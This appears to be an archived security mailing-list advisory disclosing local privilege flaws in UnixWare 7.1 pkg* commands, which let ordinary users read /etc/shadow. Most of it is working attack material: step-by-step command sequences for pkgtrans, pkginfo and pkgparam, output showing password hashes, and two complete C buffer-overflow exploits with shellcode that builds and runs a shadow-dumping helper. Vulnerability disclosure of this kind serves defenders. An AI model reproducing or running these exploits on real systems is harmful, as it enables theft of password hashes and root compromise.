UnixWare pkg* command exploits

[btellier () USA NET (Brock Tellier)]

Greetings,

OVERVIEW
Most of UnixWare's pkg commands can be exploited to print /etc/shadow, leading
to a probable root compromise.

BACKGROUND
Only tested on UnixWare 7.1.

DETAILS
The permissions for the UnixWare pkg commands are as follows:
bash-2.02$ ls -la /usr/sbin/pkgchk /usr/bin/pkginfo /usr/bin/pkgparam
/usr/bin/pkgtrans /usr/sadm/install/bin/pkgname /usr/sbin/pkgcat
/usr/sbin/pkginstall
-r-xr-xr-x    1 bin      sys          176620 May 21  1999 /usr/bin/pkginfo
-r-xr-xr-x    1 root     sys          166784 May 21  1999 /usr/bin/pkgparam
-r-xr-xr-x    1 bin      bin          166216 May 21  1999 /usr/bin/pkgtrans
-r-xr-xr-x    1 root     sys            3288 May 21  1999
/usr/sadm/install/bin/pkgname
-rwxr-xr-x    1 root     bin           19436 May 21  1999 /usr/sbin/pkgcat
-r-x------    1 root     sys          179440 May 21  1999 /usr/sbin/pkgchk
-rwxr-xr-x    1 root     bin           19680 May 21  1999
/usr/sbin/pkginstall
bash-2.02$ 

Note that none of these have any elevated modebit-based privileges.  Now let's
check out /etc/security/tcb/privs:
bash-2.02$ cat /etc/security/tcb/privs | grep pkg
179440:2448:939918606:%fixed,dacread:/usr/sbin/pkgchk
176620:53979:939918610:%fixed,dacread:/usr/bin/pkginfo
166784:32218:939918610:%fixed,dacread:/usr/bin/pkgparam
166216:46675:939918610:%fixed,dacread:/usr/bin/pkgtrans
3288:61136:939918611:%fixed,dacread:/usr/sadm/install/bin/pkgname
19436:55289:939918607:%fixed,dacread:/usr/sbin/pkgcat
19680:23331:939918607:%fixed,dacread:/usr/sbin/pkginstall

As far as I can tell, the pkgname program doesn't actually do anything and we
obviously can't exec pkgchk.  The rest of these programs are all vulnerable to
/etc/shadow printing exploits.  pkg* are able to access /etc/shadow because of
the "dacread" permission, which allows the process to override the file
permissions and ownership (but only for reading or executing).

Two of the exploits below are buffer overflow exploits which execute /tmp/pi. 
/tmp/pi is a program built by the exploit which simply cats /etc/shadow.  Thus
any spawned process of a prived program gains the same privileges as that
program.  

EXPLOIT OUTPUT
-------------- pkgtrans
For this exploit, download the attached "dut.tar" and follow the instructions
below.  dut.tar simply conforms to the pkgmap/info conventions and allows it
to read /etc/shadow.

bash-2.02$ cp dut.tar /tmp        
bash-2.02$ cd /tmp
bash-2.02$ tar xvf dut.tar
x dut/, 0 bytes, 0 tape blocks
x dut/pkginfo, 276 bytes, 1 tape block
x dut/pkgmap, 39 bytes, 1 tape block
x dut/install/, 0 bytes, 0 tape blocks
x dut/install/shadow symbolic link to /etc/shadow
bash-2.02$ pkgtrans -s /tmp /tmp/pkgtrans.shadow

The following packages are available:
  1  dut     Brock Tellier's pkgtrans exploit, install and cat
/tmp/pkgtrans.shadow  for your copy of /etc/shadow
             (IA32) .01a

Select package(s) you wish to process (or 'all' to process
all packages). (default: all) [?,??,quit]: 1
Transferring <dut> package instance to
      </tmp/pkgtrans.shadow> in datastream format
bash-2.02$ cat /tmp/trans.shadow | grep root
root:rfAf3OC7XHsj.:10925::::::
bash-2.02$  

------------- pkginfo

bash-2.02$ truss -rall -aefo pkginfo.out pkginfo -d /etc/shadow; cat
pkginfo.out | grep "r o o t"
UX:pkginfo: ERROR: attempt to process package from </etc/shadow> failed
    - bad format in datastream table-of-contents
truss: cannot control child process, pid# 9188

- KILL TRUSS PROCESS FROM ANOTHER VT - 

Killed
9187:    r o o t : r f A f 3 O C 7 X H s j . : 1 0 9 2 5 : : : : : :\n d
bash-2.02$ 

------------- pkginstall

bash-2.02$ /usr/sbin/pkginstall -s `./uwpkgi 100`:

UnixWare 7.1 pkginstall exploit prints/etc/shadow
Brock Tellier btellier () usa net

Using addr: 0x8046c3d
root:rfAf3OC7XHsj.:10925::::::
daemon:NP:6445::::::
bin:NP:6445::::::
...

-------------- pkgcat

bash-2.02$ /usr/sbin/pkgcat -s `./uwpkgcat 100`:

UnixWare 7.1 pkgcat exploit prints/etc/shadow
Brock Tellier btellier () usa net

Using addr: 0x8046c3d
root:rfAf3OC7XHsj.:10925::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
...

------------ pkgparam
bash-2.02$ pkgparam -f /etc/shadow
rfAf3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
...

EXPLOITS
--- uwpkgcat.c ---
/**
 ** UnixWare 7.1 /usr/sbin/pkgcat exploit 
 ** Prints contents of /etc/shadow (execing shell won't be enough here)
 ** Demonstrates overflow in uw71's gethostbyname() and dacread permission
 ** problems.  Use offsets of +-100.
 **
 ** Compile cc -o uwpkgcat uwpkgcat.c
 ** run /usr/sbin/pkgcat -s `./uwpkgcat 100`:
 **
 ** Brock Tellier btellier () usa net
 **/ 

#include <stdlib.h>
#include <stdio.h>

char scoshell[]= 
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

                       
#define LEN 3500
#define NOP 0x90
#define CODE "void main() { system(\"cat /etc/shadow\"); }\n"

void buildpi() {
  FILE *fp;
  char cc[100];

  fp = fopen("/tmp/pi.c", "w");
  fprintf(fp, CODE);
  fclose(fp);
  snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");
  system(cc);

}

int main(int argc, char *argv[]) {

long int offset=0;

int i;
int buflen = LEN;
long int addr;
char buf[LEN];
buildpi(); 
 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
        exit(0); 
 }
 else if (argc == 2){
   offset=atoi(argv[1]);
   
 }
 else if (argc == 3) {
  offset=atoi(argv[1]);
  buflen=atoi(argv[2]); 
   
 }
 else {
   offset=100;
   buflen=3000;

 }
 

addr=0x8046b75 + offset;

fprintf(stderr, "\nUnixWare 7.1 pkgcat exploit prints");
fprintf(stderr, "/etc/shadow\n");
fprintf(stderr, "Brock Tellier btellier () usa net\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
        *(int *)&buf[i]=addr;
buf[buflen - 1] = ':';

printf(buf);
exit(0);
}
------

--- uwpkgi.c ---
/**
 ** UnixWare 7.1 /usr/sbin/pkginstall exploit 
 ** Prints contents of /etc/shadow (execing shell won't be enough here)
 ** Demonstrates overflow in uw71's gethostbyname() and dacread permission
 ** problems.  Use offsets of +-100.
 **
 ** Compile cc -o uwpkgi uwpkgi.c
 ** run /usr/sbin/pkginstall -s `./uwpkgi 100`:
 **
 ** Brock Tellier btellier () usa net
 **/ 

#include <stdlib.h>
#include <stdio.h>

char scoshell[]= 
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

                       
#define LEN 3500
#define NOP 0x90
#define CODE "void main() { system(\"cat /etc/shadow\"); }\n"

void buildpi() {
  FILE *fp;
  char cc[100];

  fp = fopen("/tmp/pi.c", "w");
  fprintf(fp, CODE);
  fclose(fp);
  snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");
  system(cc);

}

int main(int argc, char *argv[]) {

long int offset=0;

int i;
int buflen = LEN;
long int addr;
char buf[LEN];
buildpi(); 
 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
        exit(0); 
 }
 else if (argc == 2){
   offset=atoi(argv[1]);
   
 }
 else if (argc == 3) {
  offset=atoi(argv[1]);
  buflen=atoi(argv[2]); 
   
 }
 else {
   offset=100;
   buflen=3000;

 }
 

addr=0x8046b75 + offset;

fprintf(stderr, "\nUnixWare 7.1 pkginstall exploit prints");
fprintf(stderr, "/etc/shadow\n");
fprintf(stderr, "Brock Tellier btellier () usa net\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
        *(int *)&buf[i]=addr;
buf[buflen - 1] = ':';

printf(buf);
exit(0);
}
------

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

<HR NOSHADE>
<UL>
<LI>application/x-tar attachment: dut.tar
</UL>